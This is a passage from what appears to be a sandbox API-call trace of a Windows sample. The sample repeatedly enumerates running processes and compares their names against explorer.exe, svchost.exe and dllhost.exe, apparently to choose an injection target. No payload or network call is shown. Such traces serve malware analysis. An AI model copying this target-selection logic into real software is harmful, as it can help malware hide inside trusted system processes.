(hObject=0xec) returned 1 [0255.430] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0255.430] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0255.430] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0255.430] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0255.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0255.430] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.430] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.431] CloseHandle (hObject=0xec) returned 1 [0255.431] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0255.431] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0255.431] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0255.431] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0255.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0255.431] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.431] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.431] CloseHandle (hObject=0xec) returned 1 [0255.431] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0255.431] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0255.431] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0255.431] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0255.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0255.432] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.432] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.432] CloseHandle (hObject=0xec) returned 1 [0255.432] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0255.432] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0255.432] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0255.432] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0255.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0255.433] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.433] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.433] CloseHandle (hObject=0xec) returned 1 [0255.433] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0255.433] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0255.433] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0255.433] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0255.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0255.433] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.433] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.433] CloseHandle (hObject=0xec) returned 1 [0255.433] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0255.433] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0255.433] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0255.433] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0255.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0255.434] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.434] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.434] CloseHandle (hObject=0xec) returned 1 [0255.434] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0255.434] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0255.434] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0255.434] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0255.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0255.435] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.435] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.435] CloseHandle (hObject=0xec) returned 1 [0255.435] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0255.435] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0255.435] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0255.435] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0255.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0255.435] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.435] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.435] CloseHandle (hObject=0xec) returned 1 [0255.435] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0255.435] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0255.435] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0255.435] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0255.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0255.436] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.436] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.436] CloseHandle (hObject=0xec) returned 1 [0255.436] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0255.436] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0255.436] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0255.436] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0255.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0255.437] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.437] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.437] CloseHandle (hObject=0xec) returned 1 [0255.437] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0255.437] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0255.437] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0255.437] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0255.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0255.437] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.437] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.437] CloseHandle (hObject=0xec) returned 1 [0255.437] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0255.438] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0255.438] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0255.438] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0255.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0255.438] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.438] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.438] CloseHandle (hObject=0xec) returned 1 [0255.438] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0255.438] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0255.438] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0255.438] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0255.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0255.439] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.439] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.439] CloseHandle (hObject=0xec) returned 1 [0255.439] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0255.439] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0255.439] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0255.439] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0255.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0255.439] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.439] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.439] CloseHandle (hObject=0xec) returned 1 [0255.439] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0255.440] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0255.440] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0255.440] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0255.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0255.440] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0255.441] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0255.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0255.441] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0255.442] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0255.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0255.442] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0255.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0255.443] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.443] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.443] CloseHandle (hObject=0xec) returned 1 [0255.443] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0255.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0255.443] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.443] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.443] CloseHandle (hObject=0xec) returned 1 [0255.443] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0255.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0255.444] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.444] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.444] CloseHandle (hObject=0xec) returned 1 [0255.444] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0255.444] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0255.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0255.444] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.444] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.444] CloseHandle (hObject=0xec) returned 1 [0255.445] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0255.445] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0255.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0255.445] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.446] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0255.446] CloseHandle (hObject=0xec) returned 1 [0255.446] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0255.446] CloseHandle (hObject=0xe8) returned 1 [0255.446] Sleep (dwMilliseconds=0x3e8) [0256.480] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0256.482] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0256.482] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0256.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0256.483] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0256.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0256.483] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0256.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0256.484] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0256.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0256.484] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0256.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0256.484] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0256.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0256.485] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0256.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0256.485] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0256.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0256.486] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0256.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0256.486] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0256.487] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0256.487] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0256.488] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0256.488] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0256.489] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0256.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0256.489] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 